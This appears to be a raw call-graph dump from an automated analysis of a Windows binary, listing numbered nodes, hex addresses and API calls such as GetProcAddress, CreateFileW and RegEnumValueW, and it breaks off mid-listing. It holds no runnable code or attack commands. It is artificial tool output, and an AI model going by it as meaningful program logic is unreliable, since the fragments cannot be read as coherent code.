40e140 CloseHandle CloseHandle 39060->39061 39062 40e10b MapViewOfFile 39060->39062 39061->39052 39063 40e13b FindCloseChangeNotification 39062->39063 39064 40e11f WriteFile UnmapViewOfFile 39062->39064 39063->39061 39064->39063 39066 40e18c 39065->39066 39067 406b90 11 API calls 39066->39067 39068 40e19f 39067->39068 39069 40e1a7 memset 39068->39069 39070 40e299 39068->39070 39075 40e1e8 39069->39075 39071 4069a3 ??3@YAXPAX ??3@YAXPAX 39070->39071 39072 40e2a4 39071->39072 39072->39038 39073 406e8f 13 API calls 39073->39075 39074 406b53 SetFilePointerEx ReadFile 39074->39075 39075->39073 39075->39074 39076 40e283 39075->39076 39077 40dd50 _wcsicmp 39075->39077 39081 40742e 8 API calls 39075->39081 39082 40aae3 wcslen wcslen _memicmp 39075->39082 39083 40e244 _snwprintf 39075->39083 39078 40e291 39076->39078 39079 40e288 ??3@YAXPAX 39076->39079 39077->39075 39080 40aa04 ??3@YAXPAX 39078->39080 39079->39078 39080->39070 39081->39075 39082->39075 39084 40a8d0 7 API calls 39083->39084 39084->39075 39086 40e2c2 39085->39086 39087 406b90 11 API calls 39086->39087 39098 40e2d3 39087->39098 39088 40e4a0 39089 4069a3 ??3@YAXPAX ??3@YAXPAX 39088->39089 39091 40e4ab 39089->39091 39090 406e8f 13 API calls 39090->39098 39091->39038 39092 406b53 SetFilePointerEx ReadFile 39092->39098 39093 40e489 39094 40aa04 ??3@YAXPAX 39093->39094 39095 40e491 39094->39095 39095->39088 39096 40e497 ??3@YAXPAX 39095->39096 39096->39088 39097 40dd50 _wcsicmp 39097->39098 39098->39088 39098->39090 39098->39092 39098->39093 39098->39097 39099 40dd50 _wcsicmp 39098->39099 39102 40742e 8 API calls 39098->39102 39103 40e3e0 memcpy 39098->39103 39104 40e3b3 wcschr 39098->39104 39105 40e3fb memcpy 39098->39105 39106 40e416 memcpy 39098->39106 39107 40e431 memcpy 39098->39107 39100 40e376 memset 39099->39100 39101 40aa29 6 API calls 39100->39101 39101->39098 39102->39098 39103->39098 39104->39098 39105->39098 39106->39098 39107->39098 39108->39023 39111 40a980 39109->39111 39110 40a8bb 39110->38948 39110->38949 39111->39110 39112 40a995 _wcsicmp 39111->39112 39113 40a99c wcscmp 39111->39113 39112->39111 39113->39111 39114->38952 39115->38956 39117 40aa23 RegEnumValueW 39116->39117 39117->38963 39117->38964 39119 405335 39118->39119 39120 40522a 39118->39120 39119->38546 39121 40b2cc 27 API calls 39120->39121 39122 405234 39121->39122 39123 40a804 8 API calls 39122->39123 39124 40523a 39123->39124 39163 40b273 39124->39163 39126 405248 _mbscpy _mbscat GetProcAddress 39127 40b273 27 API calls 39126->39127 39128 405279 39127->39128 39166 405211 GetProcAddress 39128->39166 39130 405282 39131 40b273 27 API calls 39130->39131 39132 40528f 39131->39132 39167 405211 GetProcAddress 39132->39167 39134 405298 39135 40b273 27 API calls 39134->39135 39136 4052a5 39135->39136 39168 405211 GetProcAddress 39136->39168 39138 4052ae 39139 40b273 27 API calls 39138->39139 39140 4052bb 39139->39140 39169 405211 GetProcAddress 39140->39169 39142 4052c4 39143 40b273 27 API calls 39142->39143 39144 4052d1 39143->39144 39170 405211 GetProcAddress 39144->39170 39146 4052da 39147 40b273 27 API calls 39146->39147 39148 4052e7 39147->39148 39171 405211 GetProcAddress 39148->39171 39150 4052f0 39151 40b273 27 API calls 39150->39151 39152 4052fd 39151->39152 39172 405211 GetProcAddress 39152->39172 39154 405306 39155 40b273 27 API calls 39154->39155 39156 405313 39155->39156 39173 405211 GetProcAddress 39156->39173 39158 40531c 39159 40b273 27 API calls 39158->39159 39160 405329 39159->39160 39174 405211 GetProcAddress 39160->39174 39164 40b58d 27 API calls 39163->39164 39165 40b18c 39164->39165 39165->39126 39166->39130 39167->39134 39168->39138 39169->39142 39170->39146 39171->39150 39172->39154 39173->39158 39176 405220 39 API calls 39175->39176 39177 405369 39176->39177 39177->38981 39177->38982 39178->38985 39179->38988 39180->38984 39181->38982 39183 40440c FreeLibrary 39182->39183 39184 40436d 39183->39184 39185 40a804 8 API calls 39184->39185 39186 404377 39185->39186 39187 404383 39186->39187 39188 404405 39186->39188 39189 40b273 27 API calls 39187->39189 39188->38555 39188->38557 39188->38558 39190 40438d GetProcAddress 39189->39190 39191 40b273 27 API calls 39190->39191 39192 4043a7 GetProcAddress 39191->39192 39193 40b273 27 API calls 39192->39193 39194 4043ba GetProcAddress 39193->39194 39195 40b273 27 API calls 39194->39195 39196 4043ce GetProcAddress 39195->39196 39197 40b273 27 API calls 39196->39197 39198 4043e2 GetProcAddress 39197->39198 39199 4043f1 39198->39199 39200 4043f7 39199->39200 39201 40440c FreeLibrary 39199->39201 39200->39188 39201->39188 39203 404413 FreeLibrary 39202->39203 39204 40441e 39202->39204 39203->39204 39204->38572 39205->38563 39207 40442e 39206->39207 39208 40447e 39206->39208 39209 40b2cc 27 API calls 39207->39209 39208->38563 39210 404438 39209->39210 39211 40a804 8 API calls 39210->39211 39212 40443e 39211->39212 39213 404445 39212->39213 39214 404467 39212->39214 39215 40b273 27 API calls 39213->39215 39214->39208 39216 404475 FreeLibrary 39214->39216 39217 40444f GetProcAddress 39215->39217 39216->39208 39217->39214 39218 404460 39217->39218 39218->39214 39220 4135f6 39219->39220 39221 4135eb FreeLibrary 39219->39221 39220->38575 39221->39220 39223 4449c4 39222->39223 39224 444a52 39222->39224 39225 40b2cc 27 API calls 39223->39225 39224->38592 39224->38593 39226 4449cb 39225->39226 39227 40a804 8 API calls 39226->39227 39228 4449d1 39227->39228 39229 40b273 27 API calls 39228->39229 39230 4449dc GetProcAddress 39229->39230 39231 40b273 27 API calls 39230->39231 39232 4449f3 GetProcAddress 39231->39232 39233 40b273 27 API calls 39232->39233 39234 444a04 GetProcAddress 39233->39234 39235 40b273 27 API calls 39234->39235 39236 444a15 GetProcAddress 39235->39236 39237 40b273 27 API calls 39236->39237 39238 444a26 GetProcAddress 39237->39238 39239 40b273 27 API calls 39238->39239 39240 444a37 GetProcAddress 39239->39240 39243->38603 39244->38603 39245->38603 39246->38603 39247->38594 39249 403a29 39248->39249 39263 403bed memset memset 39249->39263 39251 403ae7 39276 40b1ab ??3@YAXPAX ??3@YAXPAX 39251->39276 39252 403a3f memset 39258 403a2f 39252->39258 39254 403aef 39254->38611 39255 409b98 GetFileAttributesW 39255->39258 39256 40a8d0 7 API calls 39256->39258 39257 409d1f 6 API calls 39257->39258 39258->39251 39258->39252 39258->39255 39258->39256 39258->39257 39260 40a051 GetFileTime FindCloseChangeNotification 39259->39260 39261 4039ca CompareFileTime 39259->39261 39260->39261 39261->38611 39262->38610 39264 414c2e 16 API calls 39263->39264 39265 403c38 39264->39265 39266 409719 2 API calls 39265->39266 39267 403c3f wcscat 39266->39267 39268 414c2e 16 API calls 39267->39268 39269 403c61 39268->39269 39270 409719 2 API calls 39269->39270 39271 403c68 wcscat 39270->39271 39277 403af5 39271->39277 39274 403af5 20 API calls 39275 403c95 39274->39275 39275->39258 39276->39254 39278 403b02 39277->39278 39279 40ae18 9 API calls 39278->39279 39287 403b37 39279->39287 39280 403bdb 39282 40aebe FindClose 39280->39282 39281 40add4 wcscmp wcscmp 39281->39287 39283 403be6 39282->39283 39283->39274 39284 40ae18 9 API calls 39284->39287 39285 40ae51 9 API calls 39285->39287 39286 40aebe FindClose 39286->39287 39287->39280 39287->39281 39287->39284 39287->39285 39287->39286 39288 40a8d0 7 API calls 39287->39288 39288->39287 39290 409d1f 6 API calls 39289->39290 39291 404190 39290->39291 39304 409b98 GetFileAttributesW 39291->39304 39293 40419c 39294 4041a7 6 API calls 39293->39294 39295 40435c 39293->39295 39297 40424f 39294->39297 39295->38637 39297->39295 39298 40425e memset 39297->39298 39300 409d1f 6 API calls 39297->39300 39301 40a8ab 9 API calls 39297->39301 39305 414842 39297->39305 39298->39297 39299 404296 wcscpy 39298->39299 39299->39297 39300->39297 39302 4042b6 memset memset _snwprintf wcscpy 39301->39302 39302->39297 39303->38635 39304->39293 39308 41443e 39305->39308 39307 414866 39307->39297 39309 41444b 39308->39309 39310 414451 39309->39310 39311 4144a3 GetPrivateProfileStringW 39309->39311 39312 414491 39310->39312 39313 414455 wcschr 39310->39313 39311->39307 39314 414495 WritePrivateProfileStringW 39312->39314 39313->39312 39315 414463 _snwprintf 39313->39315 39314->39307 39315->39314 39316->38641 39318 40b2cc 27 API calls 39317->39318 39319 409615 39318->39319 39320 409d1f 6 API calls 39319->39320 39321 409625 39320->39321 39346 409b98 GetFileAttributesW 39321->39346 39323 409634 39324 409648 39323->39324 39347 4091b8 memset 39323->39347 39326 40b2cc 27 API calls 39324->39326 39328 408801 39324->39328 39327 40965d 39326->39327 39329 409d1f 6 API calls 39327->39329 39328->38644 39328->38645 39330 40966d 39329->39330 39399 409b98 GetFileAttributesW 39330->39399 39332 40967c 39332->39328 39333 409681 39332->39333 39400 409529 72 API calls 39333->39400 39335 409690 39335->39328 39346->39323 39401 40a6e6 WideCharToMultiByte 39347->39401 39349 409202 39402 444432 39349->39402 39352 40b273 27 API calls 39353 409236 39352->39353 39448 438552 39353->39448 39356 409383 39358 40b273 27 API calls 39356->39358 39360 409399 39358->39360 39362 438552 134 API calls 39360->39362 39380 4093a3 39362->39380 39366 4094ff 39369 4251c4 137 API calls 39369->39380 39373 4093df 39377 4253cf 17 API calls 39377->39380 39379 40951d 39379->39324 39380->39366 39380->39369 39380->39373 39380->39377 39382 4093e4 39380->39382 39399->39332 39400->39335 39401->39349 39498 4438b5 39402->39498 39404 44444c 39410 409215 39404->39410 39512 415a6d 39404->39512 39406 4442e6 11 API calls 39408 44469e 39406->39408 39407 444486 39409 4444b9 memcpy 39407->39409 39447 4444a4 39407->39447 39408->39410 39412 443d90 111 API calls 39408->39412 39516 415258 39409->39516 39410->39352 39410->39379 39412->39410 39413 444524 39414 444541 39413->39414 39415 44452a 39413->39415 39519 444316 39414->39519 39416 416935 16 API calls 39415->39416 39416->39447 39419 444316 18 API calls 39420 444563 39419->39420 39447->39406 39586 438460 39448->39586 39450 409240 39450->39356 39451 4251c4 39450->39451 39598 424f07 39451->39598 39453 4251e4 39499 4438d0 39498->39499 39510 4438c9 39498->39510 39500 415378 memcpy memcpy 39499->39500 39501 4438d5 39500->39501 39502 4154e2 10 API calls 39501->39502 39503 443906 39501->39503 39501->39510 39502->39503 39504 443970 memset 39503->39504 39503->39510 39507 44398b 39504->39507 39505 4439a0 39506 415700 10 API calls 39505->39506 39505->39510 39508 4439c0 39506->39508 39507->39505 39509 41975c 10 API calls 39507->39509 39508->39510 39511 418981 10 API calls 39508->39511 39509->39505 39510->39404 39511->39510 39513 415a77 39512->39513 39514 415a8d 39513->39514 39515 415a7e memset 39513->39515 39514->39407 39515->39514 39517 4438b5 11 API calls 39516->39517 39518 41525d 39517->39518 39518->39413 39520 444328 39519->39520 39521 444423 39520->39521 39522 44434e 39520->39522 39523 4446ea 11 API calls 39521->39523 39524 432d4e memset memset memcpy 39522->39524 39530 444381 39523->39530 39525 44435a 39524->39525 39527 444375 39525->39527 39532 44438b 39525->39532 39526 432d4e memset memset memcpy 39529 416935 16 API calls 39527->39529 39529->39530 39530->39419 39532->39526 39587 41703f 11 API calls 39586->39587 39588 43847a 39587->39588 39589 43848a 39588->39589 39590 43847e 39588->39590 39592 438270 134 API calls 39589->39592 39591 4446ea 11 API calls 39590->39591 39594 438488 39591->39594 39593 4384aa 39592->39593 39593->39594 39595 424f26 123 API calls 39593->39595 39594->39450 39596 4384bb 39595->39596 39597 438270 134 API calls 39596->39597 39597->39594 39599 424f1f 39598->39599 39600 424f0c 39598->39600 39602 424eea 11 API calls 39599->39602 39601 416760 11 API calls 39600->39601 39603 424f18 39601->39603 39604 424f24 39602->39604 39603->39453 39604->39453 39655 413f4f 39628->39655 39631 413f37 K32GetModuleFileNameExW 39632 413f4a 39631->39632 39632->38703 39634 413969 wcscpy 39633->39634 39635 41396c wcschr 39633->39635 39647 413a3a 39634->39647 39635->39634 39637 41398e 39635->39637 39660 4097f7 wcslen wcslen _memicmp 39637->39660 39639 41399a 39640 4139a4 memset 39639->39640 39641 4139e6 39639->39641 39661 409dd5 GetWindowsDirectoryW wcscpy 39640->39661 39643 413a31 wcscpy 39641->39643 39644 4139ec memset 39641->39644 39643->39647 39662 409dd5 GetWindowsDirectoryW wcscpy 39644->39662 39645 4139c9 wcscpy wcscat 39645->39647 39647->38703 39648 413a11 memcpy wcscat 39648->39647 39650 413cb0 GetModuleHandleW 39649->39650 39651 413cda 39649->39651 39650->39651 39652 413cbf GetProcAddress 39650->39652 39653 413ce3 GetProcessTimes 39651->39653 39654 413cf6 39651->39654 39652->39651 39653->38706 39654->38706 39656 413f2f 39655->39656 39657 413f54 39655->39657 39656->39631 39656->39632 39658 40a804 8 API calls 39657->39658 39659 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39658->39659 39659->39656 39660->39639 39661->39645 39662->39648 39663->38727 39664->38750 39666 409cf9 GetVersionExW 39665->39666 39667 409d0a 39665->39667 39666->39667 39667->38756 39667->38760 39668->38762 39669->38765 39670->38767 39671->38832 39673 40bba5 39672->39673 39720 40cc26 39673->39720 39676 40bd4b 39741 40cc0c 39676->39741 39681 40b2cc 27 API calls 39682 40bbef 39681->39682 39748 40ccf0 _wcsicmp 39682->39748 39684 40bbf5 39684->39676 39749 40ccb4 6 API calls 39684->39749 39686 40bc26 39687 40cf04 17 API calls 39686->39687 39688 40bc2e 39687->39688 39689 40bd43 39688->39689 39690 40b2cc 27 API calls 39688->39690 39691 40cc0c 4 API calls 39689->39691 39692 40bc40 39690->39692 39691->39676 39750 40ccf0 _wcsicmp 39692->39750 39694 40bc46 39694->39689 39695 40bc61 memset memset WideCharToMultiByte 39694->39695 39751 40103c strlen 39695->39751 39697 40bcc0 39698 40b273 27 API calls 39697->39698 39699 40bcd0 memcmp 39698->39699 39699->39689 39700 40bce2 39699->39700 39701 404423 37 API calls 39700->39701 39702 40bd10 39701->39702 39702->39689 39703 40bd3a LocalFree 39702->39703 39704 40bd1f memcpy 39702->39704 39703->39689 39704->39703 39705->38847 39707 409a74 GetTempFileNameW 39706->39707 39708 409a66 GetWindowsDirectoryW 39706->39708 39707->38846 39708->39707 39709->38884 39710->38884 39711->38884 39712->38884 39713->38884 39714->38884 39715->38884 39716->38884 39717->38884 39718->38859 39719->38881 39752 4096c3 CreateFileW 39720->39752 39722 40cc34 39723 40cc3d GetFileSize 39722->39723 39731 40bbca 39722->39731 39724 40afcf 2 API calls 39723->39724 39725 40cc64 39724->39725 39753 40a2ef ReadFile 39725->39753 39727 40cc71 39754 40ab4a MultiByteToWideChar 39727->39754 39729 40cc95 FindCloseChangeNotification 39730 40b04b ??3@YAXPAX 39729->39730 39730->39731 39731->39676 39732 40cf04 39731->39732 39733 40b633 ??3@YAXPAX 39732->39733 39734 40cf14 39733->39734 39760 40b1ab ??3@YAXPAX ??3@YAXPAX 39734->39760 39736 40bbdd 39736->39676 39736->39681 39737 40cf1b 39737->39736 39739 40cfef 39737->39739 39761 40cd4b 39737->39761 39740 40cd4b 14 API calls 39739->39740 39740->39736 39742 40b633 ??3@YAXPAX 39741->39742 39743 40cc15 39742->39743 39744 40aa04 ??3@YAXPAX 39743->39744 39745 40cc1d 39744->39745 39810 40b1ab ??3@YAXPAX ??3@YAXPAX 39745->39810 39747 40b7d4 memset CreateFileW 39747->38839 39747->38840 39748->39684 39749->39686 39750->39694 39751->39697 39752->39722 39753->39727 39755 40ab93 39754->39755 39756 40ab6b 39754->39756 39755->39729 39757 40a9ce 4 API calls 39756->39757 39758 40ab74 39757->39758 39759 40ab7c MultiByteToWideChar 39758->39759 39759->39755 39760->39737 39762 40cd7b 39761->39762 39795 40aa29 39762->39795 39764 40cef5 39765 40aa04 ??3@YAXPAX 39764->39765 39766 40cefd 39765->39766 39766->39737 39768 40aa29 6 API calls 39769 40ce1d 39768->39769 39770 40aa29 6 API calls 39769->39770 39771 40ce3e 39770->39771 39772 40ce6a 39771->39772 39803 40abb7 wcslen memmove 39771->39803 39773 40ce9f 39772->39773 39806 40abb7 wcslen memmove 39772->39806 39775 40a8d0 7 API calls 39773->39775 39778 40ceb5 39775->39778 39776 40ce56 39804 40aa71 wcslen 39776->39804 39785 40a8d0 7 API calls 39778->39785 39780 40ce8b 39807 40aa71 wcslen 39780->39807 39782 40ce5e 39805 40abb7 wcslen memmove 39782->39805 39783 40ce93 39808 40abb7 wcslen memmove 39783->39808 39787 40cecb 39785->39787 39809 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39787->39809 39789 40cedd 39790 40aa04 ??3@YAXPAX 39789->39790 39791 40cee5 39790->39791 39792 40aa04 ??3@YAXPAX 39791->39792 39793 40ceed 39792->39793 39794 40aa04 ??3@YAXPAX 39793->39794 39794->39764 39796 40aa33 39795->39796 39797 40aa63 39795->39797 39798 40aa44 39796->39798 39799 40aa38 wcslen 39796->39799 39797->39764 39797->39768 39800 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39798->39800 39799->39798 39801 40aa4d 39800->39801 39801->39797 39802 40aa51 memcpy 39801->39802 39802->39797 39803->39776 39804->39782 39805->39772 39806->39780 39807->39783 39808->39773 39809->39789 39810->39747 39811->38899 39812->38907 39889 44def7 39890 44df07 39889->39890 39891 44df00 ??3@YAXPAX 39889->39891 39892 44df17 39890->39892 39893 44df10 ??3@YAXPAX 39890->39893 39891->39890 39894 44df27 39892->39894 39895 44df20 ??3@YAXPAX 39892->39895 39893->39892 39896 44df37 39894->39896 39897 44df30 ??3@YAXPAX 39894->39897 39895->39894 39897->39896 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39898 4148b6 FindResourceW 39899 4148cf SizeofResource 39898->39899 39902 4148f9 39898->39902 39900 4148e0 LoadResource 39899->39900 39899->39902 39901 4148ee LockResource 39900->39901 39900->39902 39901->39902 37847 415304 ??3@YAXPAX 39813 427533 39817 427548 39813->39817 39826 425711 39813->39826 39814 4259da 39870 416760 11 API calls 39814->39870 39816 4275cb 39850 425506 39816->39850 39817->39816 39824 429b7a 39817->39824 39818 4260dd 39871 424251 120 API calls 39818->39871 39819 4259c2 39846 425ad6 39819->39846 39864 415c56 11 API calls 39819->39864 39876 4446ce 11 API calls 39824->39876 39826->39814 39826->39819 39829 429a4d 39826->39829 39832 422aeb memset memcpy memcpy 39826->39832 39834 4260a1 39826->39834 39840 429ac1 39826->39840 39849 425a38 39826->39849 39860 4227f0 memset memcpy 39826->39860 39861 422b84 15 API calls 39826->39861 39862 422b5d memset memcpy memcpy 39826->39862 39863 422640 13 API calls 39826->39863 39865 4241fc 11 API calls 39826->39865 39866 42413a 90 API calls 39826->39866 39830 429a66 39829->39830 39831 429a9b 39829->39831 39872 415c56 11 API calls 39830->39872 39836 429a96 39831->39836 39874 416760 11 API calls 39831->39874 39832->39826 39869 415c56 11 API calls 39834->39869 39875 424251 120 API calls 39836->39875 39839 429a7a 39873 416760 11 API calls 39839->39873 39840->39814 39840->39846 39877 415c56 11 API calls 39840->39877 39849->39819 39867 422640 13 API calls 39849->39867 39868 4226e0 12 API calls 39849->39868 39851 425554 39850->39851 39852 42554d 39850->39852 39879 422586 12 API calls 39851->39879 39878 423b34 103 API calls 39852->39878 39855 425567 39856 4255ba 39855->39856 39857 42556c memset 39855->39857 39856->39826 39858 425596 39857->39858 39858->39856 39859 4255a4 memset 39858->39859 39859->39856 39860->39826 39861->39826 39862->39826 39863->39826 39864->39814 39865->39826 39866->39826 39867->39849 39868->39849 39869->39814 39870->39818 39871->39846 39872->39839 39873->39836 39874->39836 39875->39840 39876->39840 39877->39814 39878->39851 39879->39855 39903 441b3f 39913 43a9f6 39903->39913 39905 441b61 40086 4386af memset 39905->40086 39907 44189a 39908 4418e2 39907->39908 39912 442bd4 39907->39912 39909 4418ea 39908->39909 40087 4414a9 12 API calls 39908->40087 39912->39909 40088 441409 memset 39912->40088 39914 43aa20 39913->39914 39915 43aadf 39913->39915 39914->39915 39916 43aa34 memset 39914->39916 39915->39905 39917 43aa56 39916->39917 39918 43aa4d 39916->39918 40089 43a6e7 39917->40089 40097 42c02e memset 39918->40097 39923 43aad3 40099 4169a7 11 API calls 39923->40099 39924 43aaae 39924->39915 39924->39923 39939 43aae5 39924->39939 39925 43ac18 39928 43ac47 39925->39928 40101 42bbd5 memcpy memcpy memcpy memset memcpy 39925->40101 39929 43aca8 39928->39929 40102 438eed 16 API calls 39928->40102 39933 43acd5 39929->39933 40104 4233ae 11 API calls 39929->40104 39932 43ac87 40103 4233c5 16 API calls 39932->40103 40105 423426 11 API calls 39933->40105 39937 43ace1 40106 439811 163 API calls 39937->40106 39938 43a9f6 161 API calls 39938->39939 39939->39915 39939->39925 39939->39938 40100 439bbb 22 API calls 39939->40100 39941 43acfd 39946 43ad2c 39941->39946 40107 438eed 16 API calls 39941->40107 39943 43ad19 40108 4233c5 16 API calls 39943->40108 39945 43ad58 40109 44081d 163 API calls 39945->40109 39946->39945 39949 43add9 39946->39949 40113 423426 11 API calls 39949->40113 39950 43ae3a memset 39951 43ae73 39950->39951 40114 42e1c0 147 API calls 39951->40114 39952 43adab 40111 438c4e 163 API calls 39952->40111 39953 43ad6c 39953->39915 39953->39952 40110 42370b memset memcpy memset 39953->40110 39957 43adcc 40112 440f84 12 API calls 39957->40112 39958 43ae96 40115 42e1c0 147 API calls 39958->40115 39961 43aea8 39962 43aec1 39961->39962 40116 42e199 147 API calls 39961->40116 39963 43af00 39962->39963 40117 42e1c0 147 API calls 39962->40117 39963->39915 39967 43af1a 39963->39967 39968 43b3d9 39963->39968 40118 438eed 16 API calls 39967->40118 39973 43b3f6 39968->39973 39977 43b4c8 39968->39977 39969 43b60f 39969->39915 40177 4393a5 17 API calls 39969->40177 39972 43af2f 40119 4233c5 16 API calls 39972->40119 40159 432878 12 API calls 39973->40159 39975 43af51 40120 423426 11 API calls 39975->40120 39983 43b4f2 39977->39983 40165 42bbd5 memcpy memcpy memcpy memset memcpy 39977->40165 39979 43af7d 40121 423426 11 API calls 39979->40121 40166 43a76c 21 API calls 39983->40166 39984 43b529 40167 44081d 163 API calls 39984->40167 39985 43b462 40161 423330 11 API calls 39985->40161 39986 43af94 40122 423330 11 API calls 39986->40122 39990 43afca 40123 423330 11 API calls 39990->40123 39991 43b47e 39995 43b497 39991->39995 40162 42374a memcpy memset memcpy memcpy memcpy 39991->40162 39992 43b544 39996 43b55c 39992->39996 40168 42c02e memset 39992->40168 39993 43b428 39993->39985 40160 432b60 16 API calls 39993->40160 40163 4233ae 11 API calls 39995->40163 40169 43a87a 163 API calls 39996->40169 39998 43afdb 40124 4233ae 11 API calls 39998->40124 40003 43b56c 40007 43b58a 40003->40007 40170 423330 11 API calls 40003->40170 40004 43b4b1 40164 423399 11 API calls 40004->40164 40006 43afee 40125 44081d 163 API calls 40006->40125 40171 440f84 12 API calls 40007->40171 40008 43b4c1 40173 42db80 163 API calls 40008->40173 40013 43b592 40172 43a82f 16 API calls 40013->40172 40016 43b5b4 40174 438c4e 163 API calls 40016->40174 40018 43b5cf 40175 42c02e memset 40018->40175 40020 43b005 40020->39915 40024 43b01f 40020->40024 40126 42d836 163 API calls 40020->40126 40021 43b1ef 40136 4233c5 16 API calls 40021->40136 40024->40021 40134 423330 11 API calls 40024->40134 40135 42d71d 163 API calls 40024->40135 40025 43b212 40137 423330 11 API calls 40025->40137 40027 43b087 40127 4233ae 11 API calls 40027->40127 40028 43add4 40028->39969 40176 438f86 16 API calls 40028->40176 40031 43b22a 40138 42ccb5 11 API calls 40031->40138 40034 43b23f 40139 4233ae 11 API calls 40034->40139 40035 43b10f 40130 423330 11 API calls 40035->40130 40037 43b257 40140 4233ae 11 API calls 40037->40140 40041 43b129 40131 4233ae 11 API calls 40041->40131 40042 43b26e 40141 4233ae 11 API calls 40042->40141 40045 43b09a 40045->40035 40128 42cc15 19 API calls 40045->40128 40129 4233ae 11 API calls 40045->40129 40046 43b282 40142 43a87a 163 API calls 40046->40142 40048 43b13c 40132 440f84 12 API calls 40048->40132 40050 43b29d 40143 423330 11 API calls 40050->40143 40053 43b15f 40133 4233ae 11 API calls 40053->40133 40054 43b2af 40055 43b2b8 40054->40055 40056 43b2ce 40054->40056 40144 4233ae 11 API calls 40055->40144 40145 440f84 12 API calls 40056->40145 40060 43b2c9 40147 4233ae 11 API calls 40060->40147 40061 43b2da 40146 42370b memset memcpy memset 40061->40146 40064 43b2f9 40148 423330 11 API calls 40064->40148 40066 43b30b 40149 423330 11 API calls 40066->40149 40068 43b325 40150 423399 11 API calls 40068->40150 40070 43b332 40151 4233ae 11 API calls 40070->40151 40072 43b354 40152 423399 11 API calls 40072->40152 40074 43b364 40153 43a82f 16 API calls 40074->40153 40076 43b370 40154 42db80 163 API calls 40076->40154 40078 43b380 40155 438c4e 163 API calls 40078->40155 40080 43b39e 40156 423399 11 API calls 40080->40156 40082 43b3ae 40157 43a76c 21 API calls 40082->40157 40084 43b3c3 40158 423399 11 API calls 40084->40158 40086->39907 40087->39909 40088->39912 40090 43a6f5 40089->40090 40091 43a765 40089->40091 40090->40091 40178 42a115 40090->40178 40091->39915 40098 4397fd memset 40091->40098 40095 43a73d 40095->40091 40096 42a115 147 API calls 40095->40096 40096->40091 40097->39917 40098->39924 40099->39915 40100->39939 40101->39928 40102->39932 40103->39929 40104->39933 40105->39937 40106->39941 40107->39943 40108->39946 40109->39953 40110->39952 40111->39957 40112->40028 40113->39950 40114->39958 40115->39961 40116->39962 40117->39962 40118->39972 40119->39975 40120->39979 40121->39986 40122->39990 40123->39998 40124->40006 40125->40020 40126->40027 40127->40045 40128->40045 40129->40045 40130->40041 40131->40048 40132->40053 40133->40024 40134->40024 40135->40024 40136->40025 40137->40031 40138->40034 40139->40037 40140->40042 40141->40046 40142->40050 40143->40054 40144->40060 40145->40061 40146->40060 40147->40064 40148->40066 40149->40068 40150->40070 40151->40072 40152->40074 40153->40076 40154->40078 40155->40080 40156->40082 40157->40084 40158->40028 40159->39993 40160->39985 40161->39991 40162->39995 40163->40004 40164->40008 40165->39983 40166->39984 40167->39992 40168->39996 40169->40003 40170->40007 40171->40013 40172->40008 40173->40016 40174->40018 40175->40028 40176->39969 40177->39915 40179 42a175 40178->40179 40181 42a122 40178->40181 40179->40091 40184 42b13b 147 API calls 40179->40184 40181->40179 40182 42a115 147 API calls 40181->40182 40185 43a174 40181->40185 40209 42a0a8 147 API calls 40181->40209 40182->40181 40184->40095 40199 43a196 40185->40199 40200 43a19e 40185->40200 40186 43a306 40186->40199 40229 4388c4 14 API calls 40186->40229 40189 42a115 147 API calls 40189->40200 40191 43a642 40191->40199 40233 4169a7 11 API calls 40191->40233 40195 43a635 40232 42c02e memset 40195->40232 40199->40181 40200->40186 40200->40189 40200->40199 40210 42ff8c 40200->40210 40218 415a91 40200->40218 40222 4165ff 40200->40222 40225 439504 13 API calls 40200->40225 40226 4312d0 147 API calls 40200->40226 40227 42be4c memcpy memcpy memcpy memset memcpy 40200->40227 40228 43a121 11 API calls 40200->40228 40202 4169a7 11 API calls 40203 43a325 40202->40203 40203->40191 40203->40195 40203->40199 40203->40202 40204 42b5b5 memset memcpy 40203->40204 40205 42bf4c 14 API calls 40203->40205 40208 4165ff 11 API calls 40203->40208 40230 42b63e 14 API calls 40203->40230 40231 42bfcf memcpy 40203->40231 40204->40203 40205->40203 40208->40203 40209->40181 40234 43817e 40210->40234 40212 42ff99 40213 42ffe3 40212->40213 40214 42ffd0 40212->40214 40217 42ff9d 40212->40217 40239 4169a7 11 API calls 40213->40239 40238 4169a7 11 API calls 40214->40238 40217->40200 40219 415a9d 40218->40219 40220 415ab3 40219->40220 40221 415aa4 memset 40219->40221 40220->40200 40221->40220 40388 4165a0 40222->40388 40225->40200 40226->40200 40227->40200 40228->40200 40229->40203 40230->40203 40231->40203 40232->40191 40233->40199 40235 438187 40234->40235 40237 438192 40234->40237 40240 4380f6 40235->40240 40237->40212 40238->40217 40239->40217 40242 43811f 40240->40242 40241 438164 40241->40237 40242->40241 40245 437e5e 40242->40245 40268 4300e8 memset memset memcpy 40242->40268 40269 437d3c 40245->40269 40247 437eb3 40247->40242 40248 437ea9 40248->40247 40253 437f22 40248->40253 40284 41f432 40248->40284 40251 437f06 40331 415c56 11 API calls 40251->40331 40255 437f7f 40253->40255 40256 432d4e 3 API calls 40253->40256 40254 437f95 40332 415c56 11 API calls 40254->40332 40255->40254 40257 43802b 40255->40257 40256->40255 40259 4165ff 11 API calls 40257->40259 40260 438054 40259->40260 40295 437371 40260->40295 40263 43806b 40264 438094 40263->40264 40333 42f50e 138 API calls 40263->40333 40267 437fa3 40264->40267 40334 4300e8 memset memset memcpy 40264->40334 40267->40247 40335 41f638 104 API calls 40267->40335 40268->40242 40270 437d69 40269->40270 40273 437d80 40269->40273 40336 437ccb 11 API calls 40270->40336 40272 437d76 40272->40248 40273->40272 40274 437da3 40273->40274 40276 437d90 40273->40276 40277 438460 134 API calls 40274->40277 40276->40272 40340 437ccb 11 API calls 40276->40340 40280 437dcb 40277->40280 40278 437de8 40339 424f26 123 API calls 40278->40339 40280->40278 40337 444283 13 API calls 40280->40337 40282 437dfc 40338 437ccb 11 API calls 40282->40338 40285 41f54d 40284->40285 40291 41f44f 40284->40291 40286 41f466 40285->40286 40370 41c635 memset memset 40285->40370 40286->40251 40286->40253 40291->40286 40293 41f50b 40291->40293 40341 41f1a5 40291->40341 40366 41c06f memcmp 40291->40366 40367 41f3b1 90 API calls 40291->40367 40368 41f398 86 API calls 40291->40368 40293->40285 40293->40286 40369 41c295 86 API calls 40293->40369 40371 41703f 40295->40371 40297 437399 40298 43739d 40297->40298 40300 